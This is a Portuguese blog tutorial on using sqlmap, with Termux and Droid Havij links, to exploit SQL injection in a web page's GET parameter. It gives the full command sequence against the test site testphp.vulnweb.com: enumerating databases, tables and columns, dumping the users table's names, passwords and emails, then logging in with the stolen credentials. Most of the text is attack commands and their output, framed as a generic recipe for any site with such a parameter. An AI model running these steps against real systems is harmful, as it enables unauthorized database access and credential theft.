᥀🔥SQL MAP NA PRÁTICA - TUTORIAL DE COMO USAR CORRETAMENTE + TERMUX + SCRIPT/DROID HAVIJ᥀🔥

O SQLMAP é uma ferramenta de injeção SQL desenvolvida em Python, seu objetivo é detectar e explorar vulnerabilidades de injeção SQL em aplicações ou sites web, uma vez que se detecta uma ou mais injeções de SQL em um alvo, o usuário pode escolher entre uma variedade de opções que o SQLMAP disponibiliza para explorar os dados armazenados dentro do banco de dados.


1ºPASSO

Para realizar a execução do SQLMAP é necessário utilizar um parâmetro GET exemplo:www.site.com/index.php?id=1, então para isso navegue no site ate encontrar a opção como no exemplo abaixo:


http://testphp.vulnweb.com/listproducts.php?cat=1

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –-dbs


2ºPASSO

Durante o processo de execução o SQLMAP já detecta que o banco de dados do site é MySQL e você pode ser questionado se deseja pular a verificação para outros tipos de banco de dados ou se você que fazer um teste mais profundo sobre o banco de dados detectado, neste caso responda Y (Yes/Sim).


3ºPASSO

Neste momento o SQLMAP já detectou que o parâmetro cat está vulnerável e você é questionado se deseja realizar outros testes, no momento selecione N (Not/Não).


4ºPASSO

•Como pode visualizar os banco de dados são exibidos:•

[*] acuart
[*] information_schema


5ºPASSO

Agora que foram listados os banco de dados vamos extrair as tabelas do banco de dados acuart.


sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –-dbs -D acuart –-tables

-D :Define o banco de dados que será avaliado.

acuart : Banco de dados do site.

-–tables : Lista todas as tabelas do banco de dados informado.


6ºPASSO

•Como resultado são extraídas 8 tabelas do banco de dados acuart.•
+ artists
+ carts
+ categ
+ featured
+ guestbook
+ pictures
+ products
+ users


7ºPASSO
7ºPASS
Vamos extrair todas as colunas existentes na tabela users.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –-dbs -D acuart -T users –-columns

-T : Define a tabela que será avaliada.

users : Tabela do banco de dados acuart.

-–columns : Lista todas as colunas da tabela users.


8ºPASSO

•Como resultado são extraídas 8 colunas da tabelausers.•
+ address
+ cart
+ cc
+ email
+ name
+ pass
+ phone
+ uname
 

9ºPASSO

Neste passo iremos realizar o DUMP ou seja extrair todas as informações cadastradas nas colunas da tabela users.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –-dbs -D acuart -T users -C name,pass,uname,email –-dump

-C : Define as colunas que será avaliada.

name,pass,uname,email : Lista das colunas da tabela users.

-–dump : Extrai todas as informações contidas nas colunas da tabela informada.


10ºPASSO

Segue abaixo todos os dados extraídos:
pass: test
name: John Smith
uname: test
email: email@email.com


11ºPASSO

Munido das informações extraídas realize o acesso ao sistema:

Site: testphp.vulnweb.com/login.php


Username: test
Password: test


12ºPASSO

Login realizado com sucesso, basta confirmar as informações.



꙳ ꦿDOWNLOAD TERMUX⸼

꙳ ꦿUSAR COM DROID HAVIJ⸼

꙳ ꦿINSTALAÇÃO SQLMAP⸼

Postar um comentário

Post a Comment (0)

Postagem Anterior Próxima Postagem